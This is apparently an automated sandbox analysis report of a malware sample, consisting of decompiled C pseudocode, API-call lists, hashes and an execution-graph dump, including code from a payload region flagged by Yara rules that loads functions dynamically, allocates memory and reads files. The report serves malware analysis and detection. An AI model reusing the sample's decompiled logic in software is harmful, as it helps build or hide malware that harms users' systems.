                				_t60 = __esi;
                				_t57 = __edi;
                				_t54 = __edx;
                				asm("in al, 0x0");
                				_t45 = 0;
                				if(( *(_t62 + 0xc) & 0x00000008) != 0) {
                					_t45 = 0x20;
                				}
                				if(( *(_t62 + 0xc) & 0x00004000) != 0) {
                					_t45 = _t45 | 0x00000080;
                				}
                				if(( *(_t62 + 0xc) & 0x00000080) != 0) {
                					_t45 = _t45 | 0x00000010;
                				}
                				_t33 = GetFileType( *(_t62 + 8));
                				if(_t33 != 0) {
                					__eflags = _t33 - 2;
                					if(__eflags != 0) {
                						__eflags = _t33 - 3;
                						if(__eflags == 0) {
                							_t45 = _t45 | 0x00000008;
                							__eflags = _t45;
                						}
                					} else {
                						_t45 = _t45 | 0x00000040;
                					}
                					_t61 = E00EB3A06(_t45, _t47, _t54, _t57, _t60, __eflags);
                					 *(_t62 + 0xc) = _t61;
                					__eflags = _t61 - 0xffffffff;
                					if(_t61 != 0xffffffff) {
                						 *(_t62 - 4) =  *(_t62 - 4) & 0x00000000;
                						E00EB3DB2(_t61,  *(_t62 + 8));
                						_t56 = _t61 >> 5;
                						_t52 = (_t61 & 0x0000001f) << 6;
                						 *(_t52 +  *((intOrPtr*)(0xecf230 + _t56 * 4)) + 4) = _t45 | 0x00000001;
                						 *(_t52 +  *((intOrPtr*)(0xecf230 + _t56 * 4)) + 0x24) =  *(_t52 +  *((intOrPtr*)(0xecf230 + _t56 * 4)) + 0x24) & 0x00000080;
                						 *(_t52 +  *((intOrPtr*)(0xecf230 + _t56 * 4)) + 0x24) =  *(_t52 +  *((intOrPtr*)(0xecf230 + _t56 * 4)) + 0x24) & 0x0000007f;
                						 *((intOrPtr*)(_t62 - 0x1c)) = 1;
                						 *(_t62 - 4) = 0xfffffffe;
                						E00EB3D8D(1, _t61);
                						__eflags = 1;
                						if(1 == 0) {
                							_t61 = _t61 | 0xffffffff;
                							__eflags = _t61;
                						}
                						_t40 = _t61;
                					} else {
                						 *((intOrPtr*)(E00EAF100())) = 0x18;
                						_t43 = E00EAF0CC();
                						 *_t43 =  *_t43 & 0x00000000;
                						goto L9;
                					}
                				} else {
                					_t43 = E00EAF0DF(GetLastError());
                					L9:
                					_t40 = _t43 | 0xffffffff;
                				}
                				return E00EAF225(_t40);
                			}
















                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
                • String ID:
                • API String ID: 43408053-0
                • Opcode ID: 848f810a2aa95084b9e8040f56c7cc9ff3325a041b0ff3dad74caf40290ba2d4
                • Instruction ID: 5672838568ea7ded5549dae1e5e3344575c7a96a7a6ffa5ebd023d4cb67f6592
                • Opcode Fuzzy Hash: 848f810a2aa95084b9e8040f56c7cc9ff3325a041b0ff3dad74caf40290ba2d4
                • Instruction Fuzzy Hash: C6213E315065015ECB219B79DC077DABF905F01338F28A719E8A07B2E3CB3597069F50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E00EB6902(void* __ebx, void* __ecx, void* __edx, void* __edi, void* _a4, long _a8) {
                				void* _t7;
                				void* _t8;
                				intOrPtr* _t9;
                				intOrPtr* _t12;
                				void* _t20;
                				long _t32;
                
                				if(_a4 != 0) {
                					_t32 = _a8;
                					if(_t32 != 0) {
                						_push(__ebx);
                						while(_t32 <= 0xffffffe0) {
                							if(_t32 == 0) {
                								_t32 = _t32 + 1;
                							}
                							_t7 = HeapReAlloc( *0xecf22c, 0, _a4, _t32);
                							_t20 = _t7;
                							if(_t20 != 0) {
                								L17:
                								_t8 = _t20;
                							} else {
                								if( *0xed0060 == _t7) {
                									_t9 = E00EAF100();
                									 *_t9 = E00EAF159(GetLastError());
                									goto L17;
                								} else {
                									if(E00EB4C7E(_t7, _t32) == 0) {
                										_t12 = E00EAF100();
                										 *_t12 = E00EAF159(GetLastError());
                										L12:
                										_t8 = 0;
                									} else {
                										continue;
                									}
                								}
                							}
                							goto L14;
                						}
                						E00EB4C7E(_t6, _t32);
                						 *((intOrPtr*)(E00EAF100())) = 0xc;
                						goto L12;
                					} else {
                						E00EB2248(_a4);
                						_t8 = 0;
                					}
                					L14:
                					return _t8;
                				} else {
                					return E00EB6870(__ebx, __ecx, __edx, __edi, _a8);
                				}
                			}










                APIs
                • _malloc.LIBCMT ref: 00EB690E
                  • Part of subcall function 00EB6870: __FF_MSGBANNER.LIBCMT ref: 00EB6887
                  • Part of subcall function 00EB6870: __NMSG_WRITE.LIBCMT ref: 00EB688E
                  • Part of subcall function 00EB6870: RtlAllocateHeap.NTDLL(008F0000,00000000,00000001,00000000,00000000,00000000,?,00EB22DE,00000000,00000000,00000000,00000000,?,00EB2193,00000018,00ECC228), ref: 00EB68B3
                • _free.LIBCMT ref: 00EB6921
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: AllocateHeap_free_malloc
                • String ID:
                • API String ID: 1020059152-0
                • Opcode ID: b9308b57d57c78fb18ec6cf5c098717c595fc83990a99a0ee6aa0dc77a91db29
                • Instruction ID: bb3493447c2ffea952990fc9110f13710d528ae5e3e5da6c679e0dda08395ac7
                • Opcode Fuzzy Hash: b9308b57d57c78fb18ec6cf5c098717c595fc83990a99a0ee6aa0dc77a91db29
                • Instruction Fuzzy Hash: DE110A32405215EFCB212FB0FC057EB3BD4AF553A4F206539FA45FE161DB3988408691
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00EC2241(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                				intOrPtr _t25;
                				void* _t26;
                
                				_t25 = _a16;
                				if(_t25 == 0x65 || _t25 == 0x45) {
                					_t26 = E00EC27B0(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                					goto L9;
                				} else {
                					_t34 = _t25 - 0x66;
                					if(_t25 != 0x66) {
                						__eflags = _t25 - 0x61;
                						if(_t25 == 0x61) {
                							L7:
                							_t26 = E00EC22E5(_a4, _a8, _a12, _a20, _a24, _a28);
                						} else {
                							__eflags = _t25 - 0x41;
                							if(__eflags == 0) {
                								goto L7;
                							} else {
                								_t26 = E00EC2A64(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                							}
                						}
                						L9:
                						return _t26;
                					} else {
                						return E00EC2985(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
                					}
                				}
                			}






                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction ID: 292b7bd2d9c99b2bb16a839906547967230dbf570db0668fca305cc88826b2c5
                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction Fuzzy Hash: A4014B3200014ABBCF1A5E84DD41EEE3F62BF29358B58951DFB1868035D637C9B2AB81
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 97%
                			E00EA6BF2(signed short* __ecx, void* __edx, signed char __esi, void* __eflags) {
                				intOrPtr _t14;
                				signed int _t15;
                				signed int _t17;
                				intOrPtr _t19;
                				void* _t21;
                				void* _t22;
                				signed int _t23;
                				signed short* _t25;
                				void* _t27;
                				signed int _t30;
                				void* _t32;
                				signed char _t33;
                				void* _t35;
                
                				_t33 = __esi;
                				_t27 = __edx;
                				_t25 = __ecx;
                				asm("cli");
                				if(__eflags < 0) {
                					 *((intOrPtr*)(_t35 + 0x10)) = 0x1a;
                					_t32 = 0xd;
                					while(1) {
                						_t17 =  *_t25 & 0x0000ffff;
                						if(_t17 ==  *((intOrPtr*)(_t35 + 0x10))) {
                							break;
                						}
                						if(_t17 == _t32) {
                							__eflags = _t25 - _t27 - 2;
                							if(_t25 < _t27 - 2) {
                								_t25 =  &(_t25[1]);
                								_t21 = 0xa;
                								__eflags =  *_t25 - _t21;
                								if( *_t25 != _t21) {
                									_t21 = 0xd;
                									_t32 = _t21;
                								}
                								 *_t33 = _t21;
                								_t33 = _t33 + 2;
                								__eflags = _t33;
                							}
                						} else {
                							 *_t33 = _t17;
                							_t33 = _t33 + 2;
                							_t25 =  &(_t25[1]);
                						}
                						if(_t25 < _t27) {
                							continue;
                						} else {
                						}
                						goto L19;
                					}
                					_t19 =  *((intOrPtr*)(0xecf230 +  *(_t35 - 0xc) * 4));
                					_t9 = _t19 + _t22 + 4;
                					 *_t9 =  *(_t19 + _t22 + 4) | 0x00000002;
                					__eflags =  *_t9;
                				}
                				L19:
                				_t13 = _t35 - 0x10; // 0xeb2b47
                				_t14 =  *_t13;
                				_t30 = _t33 - _t14 & 0xfffffffe;
                				_t23 =  *(_t35 - 0x18);
                				if(_t14 !=  *((intOrPtr*)(_t35 + 0xc))) {
                					E00EB2248(_t14);
                				}
                				if(_t23 != 0xfffffffe) {
                					_t30 = _t23;
                				}
                				_t15 = _t30;
                				return _t15;
                			}

















                APIs
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: __lseeki64_nolock_free
                • String ID: G+$G+
                • API String ID: 1437703282-4250722411
                • Opcode ID: c192cf80ce0b87e66fd4274a2a165142f6be05c12f7b8259ec445665c6d1a3b0
                • Instruction ID: f7cc905273a8573437fafaf7d41ef350bb67400dcf1eb5e4cdd8aca58f21581c
                • Opcode Fuzzy Hash: c192cf80ce0b87e66fd4274a2a165142f6be05c12f7b8259ec445665c6d1a3b0
                • Instruction Fuzzy Hash: 02F0F62260020583CB214FE898413B96391BF8B324F742736E925BF1E0D33578818241
                Uniqueness

                Uniqueness Score: -1.00%

                Execution Graph

                Execution Coverage:5%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:4%
                Total number of Nodes:525
                Total number of Limit Nodes:70
28155->28157 28156->28158 28159 4145a3 28157->28159 28158->28076 28160 4145cf 28159->28160 28183 41bb60 28159->28183 28160->28076 28162 4145ba 28163 41bd90 2 API calls 28162->28163 28164 4145c3 28163->28164 28164->28076 28165->28049 28166->28071 28168 414d14 28167->28168 28169 41af30 LdrLoadDll 28167->28169 28170 41a2f0 LdrLoadDll 28168->28170 28169->28168 28170->28074 28172 41a47c NtClose 28171->28172 28173 41af30 LdrLoadDll 28171->28173 28172->28078 28173->28172 28174->28058 28175->28123 28177 41bf72 28176->28177 28190 41a600 28177->28190 28179 41bf78 28179->28151 28181 41a3fc NtReadFile 28180->28181 28182 41af30 LdrLoadDll 28180->28182 28181->28150 28182->28181 28184 41bb84 28183->28184 28185 41bb6d 28183->28185 28184->28162 28185->28184 28186 41bf60 2 API calls 28185->28186 28187 41bb9b 28186->28187 28187->28162 28188->28152 28189->28140 28191 41af30 LdrLoadDll 28190->28191 28192 41a61c RtlAllocateHeap 28191->28192 28192->28179 28194 41bd3d 28193->28194 28314 41a510 28193->28314 28194->28083 28197 414081 28196->28197 28199 414089 28196->28199 28197->28086 28198 41435c 28198->28086 28199->28198 28317 41cf00 28199->28317 28201 4140dd 28202 41cf00 2 API calls 28201->28202 28206 4140e8 28202->28206 28203 414136 28205 41cf00 2 API calls 28203->28205 28208 41414a 28205->28208 28206->28203 28322 41cfa0 28206->28322 28207 41cf00 2 API calls 28210 4141bd 28207->28210 28208->28207 28209 41cf00 2 API calls 28218 414205 28209->28218 28210->28209 28212 414334 28329 41cf60 LdrLoadDll RtlFreeHeap 28212->28329 28214 41433e 28330 41cf60 LdrLoadDll RtlFreeHeap 28214->28330 28216 414348 28331 41cf60 LdrLoadDll RtlFreeHeap 28216->28331 28328 41cf60 LdrLoadDll RtlFreeHeap 28218->28328 28219 414352 28332 41cf60 LdrLoadDll RtlFreeHeap 28219->28332 28222 4153a1 28221->28222 28223 414a50 6 API calls 28222->28223 28224 4153b7 28223->28224 28225 4153f2 28224->28225 28226 415405 28224->28226 28230 41540a 28224->28230 28227 41bd90 2 API calls 28225->28227 28228 41bd90 2 API calls 
28226->28228 28229 4153f7 28227->28229 28228->28230 28229->28090 28230->28090 28333 41ac00 28231->28333 28234 41ac00 LdrLoadDll 28235 41ad5d 28234->28235 28236 41ac00 LdrLoadDll 28235->28236 28237 41ad66 28236->28237 28238 41ac00 LdrLoadDll 28237->28238 28239 41ad6f 28238->28239 28240 41ac00 LdrLoadDll 28239->28240 28241 41ad78 28240->28241 28242 41ac00 LdrLoadDll 28241->28242 28243 41ad81 28242->28243 28244 41ac00 LdrLoadDll 28243->28244 28245 41ad8d 28244->28245 28246 41ac00 LdrLoadDll 28245->28246 28247 41ad96 28246->28247 28248 41ac00 LdrLoadDll 28247->28248 28249 41ad9f 28248->28249 28250 41ac00 LdrLoadDll 28249->28250 28251 41ada8 28250->28251 28252 41ac00 LdrLoadDll 28251->28252 28253 41adb1 28252->28253 28254 41ac00 LdrLoadDll 28253->28254 28255 41adba 28254->28255 28256 41ac00 LdrLoadDll 28255->28256 28257 41adc6 28256->28257 28258 41ac00 LdrLoadDll 28257->28258 28259 41adcf 28258->28259 28260 41ac00 LdrLoadDll 28259->28260 28261 41add8 28260->28261 28262 41ac00 LdrLoadDll 28261->28262 28263 41ade1 28262->28263 28264 41ac00 LdrLoadDll 28263->28264 28265 41adea 28264->28265 28266 41ac00 LdrLoadDll 28265->28266 28267 41adf3 28266->28267 28268 41ac00 LdrLoadDll 28267->28268 28269 41adff 28268->28269 28270 41ac00 LdrLoadDll 28269->28270 28271 41ae08 28270->28271 28272 41ac00 LdrLoadDll 28271->28272 28273 41ae11 28272->28273 28274 41ac00 LdrLoadDll 28273->28274 28275 41ae1a 28274->28275 28276 41ac00 LdrLoadDll 28275->28276 28277 41ae23 28276->28277 28278 41ac00 LdrLoadDll 28277->28278 28279 41ae2c 28278->28279 28280 41ac00 LdrLoadDll 28279->28280 28281 41ae38 28280->28281 28282 41ac00 LdrLoadDll 28281->28282 28283 41ae41 28282->28283 28284 41ac00 LdrLoadDll 28283->28284 28285 41ae4a 28284->28285 28286 41ac00 LdrLoadDll 28285->28286 28287 41ae53 28286->28287 28288 41ac00 LdrLoadDll 28287->28288 28289 41ae5c 28288->28289 28290 41ac00 LdrLoadDll 28289->28290 28291 41ae65 28290->28291 28292 41ac00 LdrLoadDll 28291->28292 28293 41ae71 28292->28293 28294 41ac00 
LdrLoadDll 28293->28294 28295 41ae7a 28294->28295 28296 41ac00 LdrLoadDll 28295->28296 28297 41ae83 28296->28297 28298 41ac00 LdrLoadDll 28297->28298 28299 41ae8c 28298->28299 28300 41ac00 LdrLoadDll 28299->28300 28301 41ae95 28300->28301 28302 41ac00 LdrLoadDll 28301->28302 28303 41ae9e 28302->28303 28304 41ac00 LdrLoadDll 28303->28304 28305 41aeaa 28304->28305 28306 41ac00 LdrLoadDll 28305->28306 28307 41aeb3 28306->28307 28308 41ac00 LdrLoadDll 28307->28308 28309 41aebc 28308->28309 28309->28094 28311 41af30 LdrLoadDll 28310->28311 28312 419eac 28311->28312 28312->28015 28313->28091 28315 41af30 LdrLoadDll 28314->28315 28316 41a52c NtAllocateVirtualMemory 28315->28316 28316->28194 28318 41cf10 28317->28318 28319 41cf16 28317->28319 28318->28201 28320 41bf60 2 API calls 28319->28320 28321 41cf3c 28319->28321 28320->28321 28321->28201 28323 41cfc5 28322->28323 28324 41cffd 28322->28324 28325 41bf60 2 API calls 28323->28325 28324->28206 28326 41cfda 28325->28326 28327 41bd90 2 API calls 28326->28327 28327->28324 28328->28212 28329->28214 28330->28216 28331->28219 28332->28198 28334 41ac1b 28333->28334 28335 414e50 LdrLoadDll 28334->28335 28336 41ac3b 28335->28336 28337 414e50 LdrLoadDll 28336->28337 28338 41ace7 28336->28338 28337->28338 28338->28234 28340 41af30 LdrLoadDll 28339->28340 28341 41a65c RtlFreeHeap 28340->28341 28341->28101 28343 407eb0 28342->28343 28344 407eab 28342->28344 28345 41bd10 2 API calls 28343->28345 28344->28023 28351 407ed5 28345->28351 28346 407f38 28346->28023 28347 419e90 LdrLoadDll 28347->28351 28348 407f3e 28350 407f64 28348->28350 28352 41a590 LdrLoadDll 28348->28352 28350->28023 28351->28346 28351->28347 28351->28348 28353 41bd10 2 API calls 28351->28353 28358 41a590 28351->28358 28354 407f55 28352->28354 28353->28351 28354->28023 28356 40817e 28355->28356 28357 41a590 LdrLoadDll 28355->28357 28356->27980 28357->28356 28359 41a5ac 28358->28359 28360 41af30 LdrLoadDll 28358->28360 28359->28351 28360->28359 28362 41b593 28361->28362 
28365 40acf0 28362->28365 28366 40ad14 28365->28366 28367 40ad50 LdrLoadDll 28366->28367 28368 409c5b 28366->28368 28367->28368 28368->27988 28370 40b063 28369->28370 28372 40b0e0 28370->28372 28382 419c60 LdrLoadDll 28370->28382 28372->27993 28374 41af30 LdrLoadDll 28373->28374 28375 40f1bb 28374->28375 28375->28000 28376 41a7a0 28375->28376 28377 41af30 LdrLoadDll 28376->28377 28378 41a7bf LookupPrivilegeValueW 28377->28378 28378->27998 28380 41a24c 28379->28380 28381 41af30 LdrLoadDll 28379->28381 28380->27997 28381->28380 28382->28372 28384 40b1f0 28383->28384 28385 40b040 LdrLoadDll 28384->28385 28386 40b204 28385->28386 28386->27934 28388 40ae51 28387->28388 28389 40ae4d 28387->28389 28390 40ae6a 28388->28390 28391 40ae9c 28388->28391 28389->27937 28425 419ca0 LdrLoadDll 28390->28425 28426 419ca0 LdrLoadDll 28391->28426 28393 40aead 28393->27937 28395 40ae8c 28395->27937 28397 40f4a0 LdrLoadDll 28396->28397 28398 4143c6 28397->28398 28398->27939 28427 4087a0 28399->28427 28402 4087a0 8 API calls 28403 408a8a 28402->28403 28405 408a9d 28403->28405 28445 40f710 6 API calls 28403->28445 28405->27941 28407 41af30 LdrLoadDll 28406->28407 28408 40c322 28407->28408 28409 40f4a0 28408->28409 28410 40f4bd 28409->28410 28555 419f90 28410->28555 28413 40f505 28413->27945 28414 419fe0 LdrLoadDll 28415 40f52e 28414->28415 28415->27945 28417 40c385 28416->28417 28418 41af30 LdrLoadDll 28416->28418 28417->27951 28417->27954 28418->28417 28420 41af30 LdrLoadDll 28419->28420 28421 40c459 28420->28421 28421->27962 28423 41af30 LdrLoadDll 28422->28423 28424 40c4ac 28423->28424 28424->27966 28425->28395 28426->28393 28428 407ea0 2 API calls 28427->28428 28443 4087ba 28427->28443 28428->28443 28429 408a49 28429->28402 28429->28405 28430 408a3f 28431 408160 LdrLoadDll 28430->28431 28431->28429 28434 419ed0 LdrLoadDll 28434->28443 28436 41a460 LdrLoadDll NtClose 28436->28443 28439 40c4c0 LdrLoadDll NtClose 28439->28443 28442 419df0 LdrLoadDll 28442->28443 28443->28429 28443->28430 
28443->28434 28443->28436 28443->28439 28443->28442 28446 419ce0 28443->28446 28449 4085d0 28443->28449 28461 40f5f0 LdrLoadDll NtClose 28443->28461 28462 419d60 LdrLoadDll 28443->28462 28463 419d90 LdrLoadDll 28443->28463 28464 419e20 LdrLoadDll 28443->28464 28465 4083a0 28443->28465 28481 405f60 LdrLoadDll 28443->28481 28445->28405 28447 41af30 LdrLoadDll 28446->28447 28448 419cfc 28447->28448 28448->28443 28450 4085e6 28449->28450 28482 419850 28450->28482 28452 408771 28452->28443 28453 4085ff 28453->28452 28503 4081a0 28453->28503 28455 4086e5 28455->28452 28456 4083a0 7 API calls 28455->28456 28457 408713 28456->28457 28457->28452 28458 419ed0 LdrLoadDll 28457->28458 28459 408748 28458->28459 28459->28452 28460 41a4d0 LdrLoadDll 28459->28460 28460->28452 28461->28443 28462->28443 28463->28443 28464->28443 28466 4083c9 28465->28466 28537 408310 28466->28537 28469 41a4d0 LdrLoadDll 28470 4083dc 28469->28470 28470->28469 28471 408467 28470->28471 28473 408462 28470->28473 28545 40f670 28470->28545 28471->28443 28472 41a460 2 API calls 28474 40849a 28472->28474 28473->28472 28474->28471 28475 419ce0 LdrLoadDll 28474->28475 28476 4084ff 28475->28476 28476->28471 28549 419d20 28476->28549 28478 408563 28478->28471 28479 414a50 6 API calls 28478->28479 28480 4085b8 28479->28480 28480->28443 28481->28443 28483 41bf60 2 API calls 28482->28483 28484 419867 28483->28484 28510 409310 28484->28510 28486 419882 28487 4198c0 28486->28487 28488 4198a9 28486->28488 28491 41bd10 2 API calls 28487->28491 28489 41bd90 2 API calls 28488->28489 28490 4198b6 28489->28490 28490->28453 28492 4198fa 28491->28492 28493 41bd10 2 API calls 28492->28493 28494 419913 28493->28494 28500 419bb4 28494->28500 28516 41bd50 28494->28516 28497 419ba0 28498 41bd90 2 API calls 28497->28498 28499 419baa 28498->28499 28499->28453 28501 41bd90 2 API calls 28500->28501 28502 419c09 28501->28502 28502->28453 28504 40829f 28503->28504 28506 4081b5 28503->28506 28504->28455 28505 414a50 6 API calls 28507 
408222 28505->28507 28506->28504 28506->28505 28508 41bd90 2 API calls 28507->28508 28509 408249 28507->28509 28508->28509 28509->28455 28511 409335 28510->28511 28512 40acf0 LdrLoadDll 28511->28512 28513 409368 28512->28513 28515 40938d 28513->28515 28519 40cf20 28513->28519 28515->28486 28534 41a550 28516->28534 28520 40cf4c 28519->28520 28521 41a1b0 LdrLoadDll 28520->28521 28522 40cf65 28521->28522 28523 40cf6c 28522->28523 28530 41a1f0 28522->28530 28523->28515 28527 40cfa7 28528 41a460 2 API calls 28527->28528 28529 40cfca 28528->28529 28529->28515 28531 40cf8f 28530->28531 28532 41af30 LdrLoadDll 28530->28532 28531->28523 28533 41a7e0 LdrLoadDll 28531->28533 28532->28531 28533->28527 28535 41af30 LdrLoadDll 28534->28535 28536 419b99 28535->28536 28536->28497 28536->28500 28538 408328 28537->28538 28539 40acf0 LdrLoadDll 28538->28539 28540 408343 28539->28540 28541 414e50 LdrLoadDll 28540->28541 28542 408353 28541->28542 28543 40835c PostThreadMessageW 28542->28543 28544 408370 28542->28544 28543->28544 28544->28470 28546 40f683 28545->28546 28552 419e60 28546->28552 28550 419d3c 28549->28550 28551 41af30 LdrLoadDll 28549->28551 28550->28478 28551->28550 28553 40f6ae 28552->28553 28554 41af30 LdrLoadDll 28552->28554 28553->28470 28554->28553 28556 40f4fe 28555->28556 28557 41af30 LdrLoadDll 28555->28557 28556->28413 28556->28414 28557->28556

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 41a3db-41a429 call 41af30 NtReadFile
                C-Code - Quality: 37%
                			E0041A3DB(void* __eax, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                				void* _t22;
                				void* _t31;
                				intOrPtr* _t34;
                				void* _t36;
                
                				_t17 = _a4;
                				_t34 = _a4 + 0xc48;
                				E0041AF30(_t31, _t17, _t34,  *((intOrPtr*)(_t17 + 0x10)), 0, 0x2a);
                				_t5 =  &_a40; // 0x414a31
                				_t7 =  &_a32; // 0x414d72
                				_t13 =  &_a8; // 0x414d72
                				_t22 =  *((intOrPtr*)( *_t34))( *_t13, _a12, _a16, _a20, _a24, _a28,  *_t7, _a36,  *_t5, __eax, _t36); // executed
                				return _t22;
                			}







                APIs
                • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: FileRead
                • String ID: 1JA$rMA$rMA
                • API String ID: 2738559852-782607585
                • Opcode ID: 291b86b8802e1d868af88200425f00ab3a93119074edc7eaed9192bf387fb66a
                • Instruction ID: 7d0f0e3da2b30e1873058eb867fd0635cb8da2a31fb7a424639a84f96df8dbb8
                • Opcode Fuzzy Hash: 291b86b8802e1d868af88200425f00ab3a93119074edc7eaed9192bf387fb66a
                • Instruction Fuzzy Hash: 27F0E2B2210108ABCB04DF89CC80EEB77ADAF8C714F058249BA0D97241C630E811CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 3 41a3e0-41a3f6 4 41a3fc-41a429 NtReadFile 3->4 5 41a3f7 call 41af30 3->5 5->4
                C-Code - Quality: 37%
                			E0041A3E0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                				void* _t18;
                				void* _t27;
                				intOrPtr* _t28;
                
                				_t13 = _a4;
                				_t28 = _a4 + 0xc48;
                				E0041AF30(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                				_t4 =  &_a40; // 0x414a31
                				_t6 =  &_a32; // 0x414d72
                				_t12 =  &_a8; // 0x414d72
                				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                				return _t18;
                			}






                APIs
                • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: FileRead
                • String ID: 1JA$rMA$rMA
                • API String ID: 2738559852-782607585
                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                • Instruction ID: c75c44bd16ed9a046d03b4490adc68ebadf214b0f3589fd2ba36fb57c0fad8bd
                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                • Instruction Fuzzy Hash: 95F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 219 40acf0-40ad19 call 41cc20 222 40ad1b-40ad1e 219->222 223 40ad1f-40ad2d call 41d040 219->223 226 40ad3d-40ad4e call 41b470 223->226 227 40ad2f-40ad3a call 41d2c0 223->227 232 40ad50-40ad64 LdrLoadDll 226->232 233 40ad67-40ad6a 226->233 227->226 232->233
                C-Code - Quality: 100%
                			E0040ACF0(void* __eflags, void* _a4, intOrPtr _a8) {
                				char* _v8;
                				struct _EXCEPTION_RECORD _v12;
                				struct _OBJDIR_INFORMATION _v16;
                				char _v536;
                				void* _t15;
                				struct _OBJDIR_INFORMATION _t17;
                				struct _OBJDIR_INFORMATION _t18;
                				void* _t30;
                				void* _t31;
                				void* _t32;
                
                				_v8 =  &_v536;
                				_t15 = E0041CC20( &_v12, 0x104, _a8);
                				_t31 = _t30 + 0xc;
                				if(_t15 != 0) {
                					_t17 = E0041D040(__eflags, _v8);
                					_t32 = _t31 + 4;
                					__eflags = _t17;
                					if(_t17 != 0) {
                						E0041D2C0( &_v12, 0);
                						_t32 = _t32 + 8;
                					}
                					_t18 = E0041B470(_v8);
                					_v16 = _t18;
